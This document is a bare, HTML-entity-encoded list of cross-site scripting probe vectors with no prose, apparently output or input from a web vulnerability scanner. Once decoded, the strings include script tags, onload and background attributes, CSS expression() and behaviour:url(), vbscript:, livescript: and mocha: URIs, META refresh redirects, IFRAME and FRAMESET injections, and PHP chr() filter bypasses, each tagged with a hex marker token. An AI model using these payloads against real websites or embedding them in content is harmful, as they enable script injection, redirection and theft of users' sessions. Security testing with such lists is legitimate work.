;&amp;#x7e;&amp;#x2b;&amp;#x2d;&amp;#x5f;&amp;#x2e;&amp;#x2c;&amp;#x3a;&amp;#x3b;&amp;#x3f;&amp;#x40;&amp;#x5b;&amp;#x2f;&amp;#x7c;&amp;#x5c;&amp;#x5d;&amp;#x5e;&amp;#x60;&amp;#x3d;&amp;#x62;&amp;#x35;&amp;#x64;&amp;#x35;&amp;#x36;&amp;#x33;&amp;#x66;&amp;#x37;&amp;#x66;&amp;#x64;&amp;#x65;&amp;#x38;&amp;#x33;&amp;#x62;&amp;#x34;&amp;#x35;&amp;#x39;&amp;#x63;&amp;#x35;&amp;#x39;&amp;#x30;&amp;#x35;&amp;#x34;&amp;#x37;&amp;#x37;&amp;#x38;&amp;#x36;&amp;#x32;&amp;#x31;&amp;#x31;&amp;#x31;&amp;#x66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7;&amp;#x27;&amp;#x3b;&amp;#x21;&amp;#x2d;&amp;#x2d;&amp;#x22;&amp;#x3c;&amp;#x37;&amp;#x35;&amp;#x63;&amp;#x39;&amp;#x61;&amp;#x38;&amp;#x62;&amp;#x38;&amp;#x36;&amp;#x61;&amp;#x33;&amp;#x36;&amp;#x37;&amp;#x38;&amp;#x61;&amp;#x33;&amp;#x37;&amp;#x64;&amp;#x33;&amp;#x32;&amp;#x34;&amp;#x34;&amp;#x61;&amp;#x35;&amp;#x30;&amp;#x62;&amp;#x36;&amp;#x61;&amp;#x35;&amp;#x32;&amp;#x30;&amp;#x37;&amp;#x3e;&amp;#x3d;&amp;#x26;&amp;#x7b;&amp;#x28;&amp;#x29;&amp;#x7d;&amp;#x22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61;&amp;#x38;&amp;#x38;&amp;#x34;&amp;#x38;&amp;#x62;&amp;#x33;&amp;#x33;&amp;#x36;&amp;#x34;&amp;#x36;&amp;#x33;&amp;#x31;&amp;#x61;&amp;#x33;&amp;#x31;&amp;#x36;&amp;#x61;&amp;#x31;&amp;#x38;&amp;#x66;&amp;#x64;&amp;#x66;&amp;#x31;&amp;#x32;&amp;#x37;&amp;#x33;&amp;#x65;&amp;#x30;&amp;#x38;&amp;#x37;&amp;#x3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31;&amp;#x62;&amp;#x61;&amp;#x36;&amp;#x65;&amp;#x39;&amp;#x30;&amp;#x62;&amp;#x37;&amp;#x34;&amp;#x63;&amp;#x33;&amp;#x63;&amp;#x64;&amp;#x65;&amp;#x63;&amp;#x63;&amp;#x63;&amp;#x38;&amp;#x30;&amp;#x30;&amp;#x66;&amp;#x61;&amp;#x33;&amp;#x66;&amp;#x34;&amp;#x36;&amp;#x38;&amp;#x38;&amp;#x31;&amp;#x39;&amp;#x37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60;&amp;#x38;&amp;#x35;&amp;#x63;&amp;#x39;&amp;#x65;&amp;#x31;&amp;#x36;&amp;#x30;&amp;#x62;&amp;#x38;&amp;#x30;&amp;#x30;&amp;#x62;&amp;#x30;&amp;#x35;&amp;#x66;&amp;#x30;&amp;#x62;&amp;#x30;&amp;#x35;&amp;#x32;&amp;#x62;&amp;#x66;&amp;#x65;&amp;#x63;&amp;#x61;&amp;#x36;&amp;#x66;&amp;#x65;&amp;#x39;&amp;#x62;&amp;#x63;&amp;#x60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22;&amp;#x22;&amp;#x22;&amp;#x3e;&amp;#x61;&amp;#x34;&amp;#x32;&amp;#x34;&amp;#x33;&amp;#x38;&amp;#x37;&amp;#x38;&amp;#x38;&amp;#x37;&amp;#x34;&amp;#x31;&amp;#x36;&amp;#x64;&amp;#x62;&amp;#x30;&amp;#x38;&amp;#x32;&amp;#x61;&amp;#x37;&amp;#x39;&amp;#x32;&amp;#x31;&amp;#x30;&amp;#x66;&amp;#x63;&amp;#x33;&amp;#x61;&amp;#x31;&amp;#x37;&amp;#x32;&amp;#x3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20;&amp;#x26;&amp;#x23;&amp;#x31;&amp;#x34;&amp;#x3b;&amp;#x20;&amp;#x20;&amp;#x63;&amp;#x32;&amp;#x61;&amp;#x31;&amp;#x62;&amp;#x66;&amp;#x38;&amp;#x65;&amp;#x35;&amp;#x35;&amp;#x65;&amp;#x61;&amp;#x36;&amp;#x35;&amp;#x61;&amp;#x33;&amp;#x64;&amp;#x66;&amp;#x32;&amp;#x61;&amp;#x36;&amp;#x35;&amp;#x65;&amp;#x30;&amp;#x38;&amp;#x64;&amp;#x38;&amp;#x39;&amp;#x38;&amp;#x32;&amp;#x32;&amp;#x64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5;&amp;#x68;&amp;#x61;&amp;#x76;&amp;#x69;&amp;#x6f;&amp;#x75;&amp;#x72;&amp;#x3a;&amp;#x20;&amp;#x75;&amp;#x72;&amp;#x6c;&amp;#x28;&amp;#x31;&amp;#x32;&amp;#x32;&amp;#x32;&amp;#x64;&amp;#x34;&amp;#x34;&amp;#x34;&amp;#x36;&amp;#x36;&amp;#x65;&amp;#x63;&amp;#x36;&amp;#x39;&amp;#x66;&amp;#x31;&amp;#x31;&amp;#x63;&amp;#x66;&amp;#x36;&amp;#x32;&amp;#x38;&amp;#x36;&amp;#x64;&amp;#x36;&amp;#x64;&amp;#x30;&amp;#x37;&amp;#x31;&amp;#x63;&amp;#x62;&amp;#x30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3c;&amp;#x53;&amp;#x43;&amp;#x52;&amp;#x49;&amp;#x50;&amp;#x54;&amp;#x3e;&amp;#x32;&amp;#x38;&amp;#x34;&amp;#x62;&amp;#x61;&amp;#x65;&amp;#x65;&amp;#x31;&amp;#x63;&amp;#x66;&amp;#x31;&amp;#x65;&amp;#x63;&amp;#x35;&amp;#x37;&amp;#x37;&amp;#x31;&amp;#x61;&amp;#x36;&amp;#x36;&amp;#x38;&amp;#x35;&amp;#x37;&amp;#x39;&amp;#x36;&amp;#x30;&amp;#x62;&amp;#x36;&amp;#x64;&amp;#x30;&amp;#x35;&amp;#x35;&amp;#x2f;&amp;#x2f;&amp;#x3c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2;&amp;#x3b;&amp;#x66;&amp;#x37;&amp;#x31;&amp;#x31;&amp;#x66;&amp;#x37;&amp;#x39;&amp;#x37;&amp;#x31;&amp;#x39;&amp;#x34;&amp;#x65;&amp;#x63;&amp;#x35;&amp;#x31;&amp;#x30;&amp;#x36;&amp;#x61;&amp;#x31;&amp;#x66;&amp;#x38;&amp;#x62;&amp;#x31;&amp;#x35;&amp;#x63;&amp;#x66;&amp;#x39;&amp;#x38;&amp;#x61;&amp;#x63;&amp;#x36;&amp;#x34;&amp;#x2f;&amp;#x2f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7;&amp;#x30;&amp;#x34;&amp;#x31;&amp;#x37;&amp;#x65;&amp;#x35;&amp;#x34;&amp;#x31;&amp;#x31;&amp;#x37;&amp;#x30;&amp;#x35;&amp;#x64;&amp;#x61;&amp;#x64;&amp;#x64;&amp;#x39;&amp;#x36;&amp;#x38;&amp;#x37;&amp;#x36;&amp;#x64;&amp;#x61;&amp;#x32;&amp;#x30;&amp;#x38;&amp;#x65;&amp;#x30;&amp;#x35;&amp;#x30;&amp;#x30;&amp;#x62;&amp;#x27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f;&amp;#x44;&amp;#x59;&amp;#x20;&amp;#x42;&amp;#x41;&amp;#x43;&amp;#x4b;&amp;#x47;&amp;#x52;&amp;#x4f;&amp;#x55;&amp;#x4e;&amp;#x44;&amp;#x3d;&amp;#x22;&amp;#x64;&amp;#x36;&amp;#x66;&amp;#x63;&amp;#x32;&amp;#x66;&amp;#x65;&amp;#x61;&amp;#x39;&amp;#x39;&amp;#x66;&amp;#x35;&amp;#x38;&amp;#x61;&amp;#x37;&amp;#x65;&amp;#x33;&amp;#x35;&amp;#x33;&amp;#x36;&amp;#x34;&amp;#x63;&amp;#x37;&amp;#x61;&amp;#x36;&amp;#x33;&amp;#x33;&amp;#x36;&amp;#x63;&amp;#x63;&amp;#x31;&amp;#x61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e;&amp;#x50;&amp;#x55;&amp;#x54;&amp;#x20;&amp;#x54;&amp;#x59;&amp;#x50;&amp;#x45;&amp;#x3d;&amp;#x22;&amp;#x49;&amp;#x4d;&amp;#x41;&amp;#x47;&amp;#x45;&amp;#x22;&amp;#x20;&amp;#x53;&amp;#x52;&amp;#x43;&amp;#x3d;&amp;#x22;&amp;#x33;&amp;#x64;&amp;#x36;&amp;#x34;&amp;#x34;&amp;#x31;&amp;#x33;&amp;#x32;&amp;#x62;&amp;#x62;&amp;#x61;&amp;#x30;&amp;#x66;&amp;#x64;&amp;#x34;&amp;#x36;&amp;#x66;&amp;#x61;&amp;#x37;&amp;#x65;&amp;#x31;&amp;#x61;&amp;#x31;&amp;#x38;&amp;#x39;&amp;#x33;&amp;#x65;&amp;#x63;&amp;#x38;&amp;#x36;&amp;#x33;&amp;#x3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f;&amp;#x44;&amp;#x59;&amp;#x20;&amp;#x4f;&amp;#x4e;&amp;#x4c;&amp;#x4f;&amp;#x41;&amp;#x44;&amp;#x3d;&amp;#x64;&amp;#x32;&amp;#x64;&amp;#x36;&amp;#x64;&amp;#x33;&amp;#x38;&amp;#x32;&amp;#x37;&amp;#x38;&amp;#x34;&amp;#x39;&amp;#x36;&amp;#x61;&amp;#x39;&amp;#x63;&amp;#x32;&amp;#x63;&amp;#x37;&amp;#x32;&amp;#x66;&amp;#x34;&amp;#x38;&amp;#x37;&amp;#x37;&amp;#x66;&amp;#x35;&amp;#x32;&amp;#x63;&amp;#x65;&amp;#x65;&amp;#x37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44;&amp;#x59;&amp;#x4e;&amp;#x53;&amp;#x52;&amp;#x43;&amp;#x3d;&amp;#x22;&amp;#x64;&amp;#x62;&amp;#x39;&amp;#x66;&amp;#x32;&amp;#x63;&amp;#x30;&amp;#x36;&amp;#x64;&amp;#x62;&amp;#x66;&amp;#x31;&amp;#x34;&amp;#x37;&amp;#x37;&amp;#x33;&amp;#x32;&amp;#x63;&amp;#x63;&amp;#x37;&amp;#x31;&amp;#x63;&amp;#x39;&amp;#x63;&amp;#x35;&amp;#x34;&amp;#x37;&amp;#x33;&amp;#x65;&amp;#x65;&amp;#x31;&amp;#x36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4c;&amp;#x4f;&amp;#x57;&amp;#x53;&amp;#x52;&amp;#x43;&amp;#x3d;&amp;#x22;&amp;#x63;&amp;#x35;&amp;#x36;&amp;#x38;&amp;#x62;&amp;#x30;&amp;#x38;&amp;#x31;&amp;#x33;&amp;#x38;&amp;#x63;&amp;#x33;&amp;#x64;&amp;#x33;&amp;#x39;&amp;#x35;&amp;#x33;&amp;#x32;&amp;#x36;&amp;#x66;&amp;#x35;&amp;#x66;&amp;#x37;&amp;#x38;&amp;#x31;&amp;#x66;&amp;#x30;&amp;#x64;&amp;#x39;&amp;#x39;&amp;#x34;&amp;#x6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7;&amp;#x53;&amp;#x4f;&amp;#x55;&amp;#x4e;&amp;#x44;&amp;#x20;&amp;#x53;&amp;#x52;&amp;#x43;&amp;#x3d;&amp;#x22;&amp;#x33;&amp;#x32;&amp;#x65;&amp;#x62;&amp;#x61;&amp;#x37;&amp;#x62;&amp;#x64;&amp;#x62;&amp;#x62;&amp;#x33;&amp;#x61;&amp;#x37;&amp;#x62;&amp;#x31;&amp;#x35;&amp;#x63;&amp;#x61;&amp;#x32;&amp;#x63;&amp;#x33;&amp;#x64;&amp;#x34;&amp;#x31;&amp;#x63;&amp;#x38;&amp;#x66;&amp;#x36;&amp;#x32;&amp;#x38;&amp;#x34;&amp;#x64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52;&amp;#x20;&amp;#x53;&amp;#x49;&amp;#x5a;&amp;#x45;&amp;#x3d;&amp;#x22;&amp;#x26;&amp;#x7b;&amp;#x34;&amp;#x65;&amp;#x63;&amp;#x30;&amp;#x37;&amp;#x30;&amp;#x36;&amp;#x36;&amp;#x33;&amp;#x31;&amp;#x33;&amp;#x61;&amp;#x61;&amp;#x31;&amp;#x66;&amp;#x63;&amp;#x65;&amp;#x35;&amp;#x31;&amp;#x32;&amp;#x61;&amp;#x33;&amp;#x31;&amp;#x37;&amp;#x39;&amp;#x66;&amp;#x36;&amp;#x65;&amp;#x38;&amp;#x32;&amp;#x62;&amp;#x31;&amp;#x7d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c;&amp;#x49;&amp;#x4e;&amp;#x4b;&amp;#x20;&amp;#x52;&amp;#x45;&amp;#x4c;&amp;#x3d;&amp;#x22;&amp;#x73;&amp;#x74;&amp;#x79;&amp;#x6c;&amp;#x65;&amp;#x73;&amp;#x68;&amp;#x65;&amp;#x65;&amp;#x74;&amp;#x22;&amp;#x20;&amp;#x48;&amp;#x52;&amp;#x45;&amp;#x46;&amp;#x3d;&amp;#x22;&amp;#x36;&amp;#x61;&amp;#x31;&amp;#x31;&amp;#x36;&amp;#x37;&amp;#x32;&amp;#x35;&amp;#x33;&amp;#x64;&amp;#x63;&amp;#x64;&amp;#x63;&amp;#x36;&amp;#x38;&amp;#x37;&amp;#x62;&amp;#x66;&amp;#x61;&amp;#x35;&amp;#x64;&amp;#x34;&amp;#x35;&amp;#x38;&amp;#x37;&amp;#x63;&amp;#x38;&amp;#x31;&amp;#x32;&amp;#x64;&amp;#x61;&amp;#x34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7;&amp;#x76;&amp;#x62;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x31;&amp;#x33;&amp;#x35;&amp;#x63;&amp;#x30;&amp;#x35;&amp;#x64;&amp;#x33;&amp;#x61;&amp;#x65;&amp;#x62;&amp;#x39;&amp;#x66;&amp;#x61;&amp;#x39;&amp;#x64;&amp;#x64;&amp;#x37;&amp;#x36;&amp;#x62;&amp;#x64;&amp;#x34;&amp;#x36;&amp;#x66;&amp;#x65;&amp;#x33;&amp;#x66;&amp;#x64;&amp;#x36;&amp;#x66;&amp;#x33;&amp;#x63;&amp;#x27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6d;&amp;#x6f;&amp;#x63;&amp;#x68;&amp;#x61;&amp;#x3a;&amp;#x5b;&amp;#x64;&amp;#x38;&amp;#x64;&amp;#x39;&amp;#x30;&amp;#x34;&amp;#x39;&amp;#x34;&amp;#x35;&amp;#x39;&amp;#x33;&amp;#x31;&amp;#x64;&amp;#x66;&amp;#x35;&amp;#x62;&amp;#x65;&amp;#x62;&amp;#x64;&amp;#x38;&amp;#x64;&amp;#x32;&amp;#x62;&amp;#x37;&amp;#x36;&amp;#x64;&amp;#x35;&amp;#x64;&amp;#x31;&amp;#x62;&amp;#x65;&amp;#x35;&amp;#x5d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6c;&amp;#x69;&amp;#x76;&amp;#x65;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x5b;&amp;#x65;&amp;#x37;&amp;#x61;&amp;#x66;&amp;#x39;&amp;#x61;&amp;#x38;&amp;#x38;&amp;#x33;&amp;#x35;&amp;#x62;&amp;#x65;&amp;#x64;&amp;#x31;&amp;#x65;&amp;#x34;&amp;#x33;&amp;#x34;&amp;#x66;&amp;#x61;&amp;#x38;&amp;#x36;&amp;#x66;&amp;#x36;&amp;#x35;&amp;#x37;&amp;#x63;&amp;#x31;&amp;#x38;&amp;#x31;&amp;#x36;&amp;#x38;&amp;#x5d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d;&amp;#x45;&amp;#x54;&amp;#x41;&amp;#x20;&amp;#x48;&amp;#x54;&amp;#x54;&amp;#x50;&amp;#x2d;&amp;#x45;&amp;#x51;&amp;#x55;&amp;#x49;&amp;#x56;&amp;#x3d;&amp;#x22;&amp;#x72;&amp;#x65;&amp;#x66;&amp;#x72;&amp;#x65;&amp;#x73;&amp;#x68;&amp;#x22;&amp;#x20;&amp;#x43;&amp;#x4f;&amp;#x4e;&amp;#x54;&amp;#x45;&amp;#x4e;&amp;#x54;&amp;#x3d;&amp;#x22;&amp;#x30;&amp;#x3b;&amp;#x75;&amp;#x72;&amp;#x6c;&amp;#x3d;&amp;#x62;&amp;#x32;&amp;#x35;&amp;#x34;&amp;#x61;&amp;#x66;&amp;#x62;&amp;#x39;&amp;#x39;&amp;#x30;&amp;#x61;&amp;#x39;&amp;#x38;&amp;#x30;&amp;#x37;&amp;#x62;&amp;#x39;&amp;#x38;&amp;#x31;&amp;#x36;&amp;#x36;&amp;#x36;&amp;#x36;&amp;#x37;&amp;#x63;&amp;#x30;&amp;#x31;&amp;#x31;&amp;#x36;&amp;#x32;&amp;#x65;&amp;#x30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20;&amp;#x42;&amp;#x41;&amp;#x43;&amp;#x4b;&amp;#x47;&amp;#x52;&amp;#x4f;&amp;#x55;&amp;#x4e;&amp;#x44;&amp;#x3d;&amp;#x22;&amp;#x33;&amp;#x62;&amp;#x61;&amp;#x62;&amp;#x35;&amp;#x62;&amp;#x32;&amp;#x39;&amp;#x39;&amp;#x65;&amp;#x36;&amp;#x34;&amp;#x39;&amp;#x37;&amp;#x35;&amp;#x36;&amp;#x36;&amp;#x38;&amp;#x37;&amp;#x38;&amp;#x37;&amp;#x32;&amp;#x33;&amp;#x33;&amp;#x65;&amp;#x35;&amp;#x61;&amp;#x61;&amp;#x31;&amp;#x64;&amp;#x61;&amp;#x3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20;&amp;#x42;&amp;#x41;&amp;#x43;&amp;#x4b;&amp;#x47;&amp;#x52;&amp;#x4f;&amp;#x55;&amp;#x4e;&amp;#x44;&amp;#x3d;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x33;&amp;#x39;&amp;#x66;&amp;#x34;&amp;#x30;&amp;#x35;&amp;#x65;&amp;#x33;&amp;#x35;&amp;#x36;&amp;#x66;&amp;#x36;&amp;#x34;&amp;#x37;&amp;#x30;&amp;#x64;&amp;#x38;&amp;#x38;&amp;#x38;&amp;#x34;&amp;#x34;&amp;#x36;&amp;#x61;&amp;#x35;&amp;#x61;&amp;#x65;&amp;#x39;&amp;#x37;&amp;#x38;&amp;#x66;&amp;#x33;&amp;#x37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3e;&amp;#x3c;&amp;#x54;&amp;#x44;&amp;#x20;&amp;#x42;&amp;#x41;&amp;#x43;&amp;#x4b;&amp;#x47;&amp;#x52;&amp;#x4f;&amp;#x55;&amp;#x4e;&amp;#x44;&amp;#x3d;&amp;#x22;&amp;#x37;&amp;#x33;&amp;#x35;&amp;#x34;&amp;#x37;&amp;#x61;&amp;#x35;&amp;#x35;&amp;#x36;&amp;#x32;&amp;#x32;&amp;#x61;&amp;#x66;&amp;#x31;&amp;#x65;&amp;#x66;&amp;#x61;&amp;#x38;&amp;#x39;&amp;#x33;&amp;#x64;&amp;#x31;&amp;#x64;&amp;#x62;&amp;#x62;&amp;#x63;&amp;#x64;&amp;#x66;&amp;#x63;&amp;#x62;&amp;#x61;&amp;#x6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1;&amp;#x63;&amp;#x6b;&amp;#x67;&amp;#x72;&amp;#x6f;&amp;#x75;&amp;#x6e;&amp;#x64;&amp;#x2d;&amp;#x69;&amp;#x6d;&amp;#x61;&amp;#x67;&amp;#x65;&amp;#x3a;&amp;#x20;&amp;#x75;&amp;#x72;&amp;#x6c;&amp;#x28;&amp;#x31;&amp;#x33;&amp;#x34;&amp;#x34;&amp;#x32;&amp;#x63;&amp;#x65;&amp;#x63;&amp;#x38;&amp;#x36;&amp;#x65;&amp;#x35;&amp;#x37;&amp;#x65;&amp;#x32;&amp;#x36;&amp;#x39;&amp;#x65;&amp;#x64;&amp;#x31;&amp;#x62;&amp;#x65;&amp;#x32;&amp;#x64;&amp;#x65;&amp;#x62;&amp;#x66;&amp;#x32;&amp;#x65;&amp;#x38;&amp;#x33;&amp;#x32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77;&amp;#x69;&amp;#x64;&amp;#x74;&amp;#x68;&amp;#x3a;&amp;#x20;&amp;#x65;&amp;#x78;&amp;#x70;&amp;#x72;&amp;#x65;&amp;#x73;&amp;#x73;&amp;#x69;&amp;#x6f;&amp;#x6e;&amp;#x28;&amp;#x31;&amp;#x64;&amp;#x30;&amp;#x34;&amp;#x32;&amp;#x32;&amp;#x37;&amp;#x30;&amp;#x30;&amp;#x39;&amp;#x63;&amp;#x34;&amp;#x65;&amp;#x63;&amp;#x61;&amp;#x64;&amp;#x63;&amp;#x35;&amp;#x66;&amp;#x61;&amp;#x33;&amp;#x39;&amp;#x65;&amp;#x39;&amp;#x34;&amp;#x31;&amp;#x30;&amp;#x65;&amp;#x62;&amp;#x32;&amp;#x65;&amp;#x34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6;&amp;#x52;&amp;#x41;&amp;#x4d;&amp;#x45;&amp;#x20;&amp;#x53;&amp;#x52;&amp;#x43;&amp;#x3d;&amp;#x22;&amp;#x64;&amp;#x31;&amp;#x34;&amp;#x65;&amp;#x34;&amp;#x66;&amp;#x64;&amp;#x63;&amp;#x36;&amp;#x33;&amp;#x65;&amp;#x64;&amp;#x32;&amp;#x63;&amp;#x65;&amp;#x37;&amp;#x62;&amp;#x61;&amp;#x66;&amp;#x31;&amp;#x36;&amp;#x63;&amp;#x31;&amp;#x36;&amp;#x65;&amp;#x35;&amp;#x61;&amp;#x37;&amp;#x63;&amp;#x36;&amp;#x38;&amp;#x37;&amp;#x22;&amp;#x3e;&amp;#x3c;&amp;#x2f;&amp;#x49;&amp;#x46;&amp;#x52;&amp;#x41;&amp;#x4d;&amp;#x4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f;&amp;#x20;&amp;#x2f;&amp;#x6f;&amp;#x6e;&amp;#x6c;&amp;#x6f;&amp;#x61;&amp;#x64;&amp;#x3d;&amp;#x32;&amp;#x33;&amp;#x62;&amp;#x31;&amp;#x37;&amp;#x30;&amp;#x30;&amp;#x61;&amp;#x34;&amp;#x39;&amp;#x66;&amp;#x64;&amp;#x35;&amp;#x35;&amp;#x39;&amp;#x65;&amp;#x34;&amp;#x34;&amp;#x39;&amp;#x64;&amp;#x34;&amp;#x62;&amp;#x62;&amp;#x33;&amp;#x31;&amp;#x31;&amp;#x32;&amp;#x32;&amp;#x37;&amp;#x38;&amp;#x63;&amp;#x33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f;&amp;#x20;&amp;#x22;&amp;#x6f;&amp;#x6e;&amp;#x6c;&amp;#x6f;&amp;#x61;&amp;#x64;&amp;#x3d;&amp;#x61;&amp;#x39;&amp;#x66;&amp;#x39;&amp;#x64;&amp;#x36;&amp;#x66;&amp;#x65;&amp;#x62;&amp;#x64;&amp;#x31;&amp;#x66;&amp;#x62;&amp;#x65;&amp;#x36;&amp;#x37;&amp;#x63;&amp;#x35;&amp;#x34;&amp;#x64;&amp;#x64;&amp;#x36;&amp;#x66;&amp;#x36;&amp;#x38;&amp;#x32;&amp;#x66;&amp;#x61;&amp;#x33;&amp;#x63;&amp;#x34;&amp;#x33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f;&amp;#x2f;&amp;#x2f;&amp;#x2f;&amp;#x2f;&amp;#x2f;&amp;#x2f;&amp;#x6f;&amp;#x6e;&amp;#x6c;&amp;#x6f;&amp;#x61;&amp;#x64;&amp;#x3d;&amp;#x30;&amp;#x36;&amp;#x65;&amp;#x32;&amp;#x34;&amp;#x34;&amp;#x35;&amp;#x34;&amp;#x36;&amp;#x62;&amp;#x38;&amp;#x63;&amp;#x37;&amp;#x35;&amp;#x36;&amp;#x30;&amp;#x30;&amp;#x63;&amp;#x64;&amp;#x39;&amp;#x33;&amp;#x65;&amp;#x35;&amp;#x36;&amp;#x66;&amp;#x65;&amp;#x35;&amp;#x61;&amp;#x36;&amp;#x65;&amp;#x30;&amp;#x34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0;&amp;#x22;&amp;#x6f;&amp;#x6e;&amp;#x6c;&amp;#x6f;&amp;#x61;&amp;#x64;&amp;#x3d;&amp;#x66;&amp;#x66;&amp;#x33;&amp;#x31;&amp;#x33;&amp;#x64;&amp;#x38;&amp;#x35;&amp;#x35;&amp;#x30;&amp;#x36;&amp;#x63;&amp;#x35;&amp;#x38;&amp;#x65;&amp;#x38;&amp;#x31;&amp;#x66;&amp;#x37;&amp;#x33;&amp;#x33;&amp;#x37;&amp;#x61;&amp;#x65;&amp;#x35;&amp;#x36;&amp;#x61;&amp;#x33;&amp;#x65;&amp;#x37;&amp;#x35;&amp;#x64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f;&amp;#x20;&amp;#x22;&amp;#x6f;&amp;#x6e;&amp;#x6c;&amp;#x6f;&amp;#x61;&amp;#x64;&amp;#x3d;&amp;#x34;&amp;#x30;&amp;#x65;&amp;#x37;&amp;#x30;&amp;#x31;&amp;#x64;&amp;#x32;&amp;#x61;&amp;#x62;&amp;#x61;&amp;#x38;&amp;#x34;&amp;#x61;&amp;#x39;&amp;#x37;&amp;#x64;&amp;#x63;&amp;#x36;&amp;#x64;&amp;#x65;&amp;#x30;&amp;#x36;&amp;#x31;&amp;#x62;&amp;#x38;&amp;#x39;&amp;#x31;&amp;#x39;&amp;#x32;&amp;#x64;&amp;#x30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3c;&amp;#x3f;&amp;#x70;&amp;#x68;&amp;#x70;&amp;#x20;&amp;#x65;&amp;#x63;&amp;#x68;&amp;#x6f;&amp;#x20;&amp;#x63;&amp;#x68;&amp;#x72;&amp;#x28;&amp;#x31;&amp;#x31;&amp;#x29;&amp;#x3f;&amp;#x3e;&amp;#x20;&amp;#x6f;&amp;#x6e;&amp;#x6c;&amp;#x6f;&amp;#x61;&amp;#x64;&amp;#x3d;&amp;#x63;&amp;#x36;&amp;#x62;&amp;#x34;&amp;#x63;&amp;#x66;&amp;#x63;&amp;#x38;&amp;#x32;&amp;#x31;&amp;#x63;&amp;#x31;&amp;#x34;&amp;#x36;&amp;#x66;&amp;#x34;&amp;#x35;&amp;#x65;&amp;#x39;&amp;#x33;&amp;#x36;&amp;#x34;&amp;#x65;&amp;#x31;&amp;#x65;&amp;#x36;&amp;#x66;&amp;#x63;&amp;#x33;&amp;#x64;&amp;#x65;&amp;#x64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3c;&amp;#x3f;&amp;#x70;&amp;#x68;&amp;#x70;&amp;#x20;&amp;#x65;&amp;#x63;&amp;#x68;&amp;#x6f;&amp;#x20;&amp;#x63;&amp;#x68;&amp;#x72;&amp;#x28;&amp;#x31;&amp;#x32;&amp;#x29;&amp;#x3f;&amp;#x3e;&amp;#x20;&amp;#x6f;&amp;#x6e;&amp;#x6c;&amp;#x6f;&amp;#x61;&amp;#x64;&amp;#x3d;&amp;#x61;&amp;#x36;&amp;#x33;&amp;#x38;&amp;#x39;&amp;#x34;&amp;#x36;&amp;#x38;&amp;#x39;&amp;#x31;&amp;#x63;&amp;#x61;&amp;#x36;&amp;#x30;&amp;#x31;&amp;#x33;&amp;#x30;&amp;#x37;&amp;#x62;&amp;#x65;&amp;#x62;&amp;#x66;&amp;#x65;&amp;#x32;&amp;#x31;&amp;#x64;&amp;#x36;&amp;#x30;&amp;#x39;&amp;#x63;&amp;#x32;&amp;#x39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6;&amp;#x52;&amp;#x41;&amp;#x4d;&amp;#x45;&amp;#x53;&amp;#x45;&amp;#x54;&amp;#x3e;&amp;#x3c;&amp;#x46;&amp;#x52;&amp;#x41;&amp;#x4d;&amp;#x45;&amp;#x20;&amp;#x53;&amp;#x52;&amp;#x43;&amp;#x3d;&amp;#x22;&amp;#x35;&amp;#x62;&amp;#x36;&amp;#x62;&amp;#x65;&amp;#x36;&amp;#x66;&amp;#x64;&amp;#x63;&amp;#x34;&amp;#x35;&amp;#x33;&amp;#x62;&amp;#x66;&amp;#x33;&amp;#x65;&amp;#x32;&amp;#x34;&amp;#x64;&amp;#x62;&amp;#x38;&amp;#x38;&amp;#x35;&amp;#x39;&amp;#x31;&amp;#x38;&amp;#x66;&amp;#x35;&amp;#x36;&amp;#x39;&amp;#x38;&amp;#x65;&amp;#x22;&amp;#x3e;&amp;#x3c;&amp;#x2f;&amp;#x46;&amp;#x52;&amp;#x41;&amp;#x4d;&amp;#x45;&amp;#x53;&amp;#x45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20;&amp;#x42;&amp;#x41;&amp;#x43;&amp;#x4b;&amp;#x47;&amp;#x52;&amp;#x4f;&amp;#x55;&amp;#x4e;&amp;#x44;&amp;#x3d;&amp;#x22;&amp;#x63;&amp;#x37;&amp;#x33;&amp;#x30;&amp;#x38;&amp;#x39;&amp;#x65;&amp;#x64;&amp;#x38;&amp;#x36;&amp;#x39;&amp;#x31;&amp;#x63;&amp;#x65;&amp;#x35;&amp;#x61;&amp;#x34;&amp;#x61;&amp;#x65;&amp;#x32;&amp;#x30;&amp;#x32;&amp;#x30;&amp;#x39;&amp;#x39;&amp;#x35;&amp;#x61;&amp;#x31;&amp;#x31;&amp;#x39;&amp;#x61;&amp;#x32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3e;&amp;#x3c;&amp;#x54;&amp;#x44;&amp;#x20;&amp;#x42;&amp;#x41;&amp;#x43;&amp;#x4b;&amp;#x47;&amp;#x52;&amp;#x4f;&amp;#x55;&amp;#x4e;&amp;#x44;&amp;#x3d;&amp;#x22;&amp;#x62;&amp;#x66;&amp;#x65;&amp;#x30;&amp;#x65;&amp;#x65;&amp;#x64;&amp;#x64;&amp;#x32;&amp;#x61;&amp;#x66;&amp;#x31;&amp;#x32;&amp;#x31;&amp;#x38;&amp;#x33;&amp;#x35;&amp;#x64;&amp;#x31;&amp;#x31;&amp;#x33;&amp;#x37;&amp;#x36;&amp;#x38;&amp;#x65;&amp;#x37;&amp;#x64;&amp;#x62;&amp;#x36;&amp;#x32;&amp;#x65;&amp;#x3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1;&amp;#x63;&amp;#x6b;&amp;#x67;&amp;#x72;&amp;#x6f;&amp;#x75;&amp;#x6e;&amp;#x64;&amp;#x2d;&amp;#x69;&amp;#x6d;&amp;#x61;&amp;#x67;&amp;#x65;&amp;#x3a;&amp;#x20;&amp;#x75;&amp;#x72;&amp;#x6c;&amp;#x28;&amp;#x26;&amp;#x23;&amp;#x31;&amp;#x3b;&amp;#x34;&amp;#x32;&amp;#x63;&amp;#x65;&amp;#x38;&amp;#x66;&amp;#x30;&amp;#x31;&amp;#x33;&amp;#x31;&amp;#x30;&amp;#x33;&amp;#x61;&amp;#x64;&amp;#x38;&amp;#x65;&amp;#x63;&amp;#x62;&amp;#x64;&amp;#x36;&amp;#x61;&amp;#x31;&amp;#x65;&amp;#x37;&amp;#x30;&amp;#x34;&amp;#x30;&amp;#x61;&amp;#x38;&amp;#x35;&amp;#x62;&amp;#x34;&amp;#x2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77;&amp;#x69;&amp;#x64;&amp;#x74;&amp;#x68;&amp;#x3a;&amp;#x20;&amp;#x65;&amp;#x78;&amp;#x70;&amp;#x72;&amp;#x65;&amp;#x73;&amp;#x73;&amp;#x69;&amp;#x6f;&amp;#x6e;&amp;#x28;&amp;#x36;&amp;#x64;&amp;#x3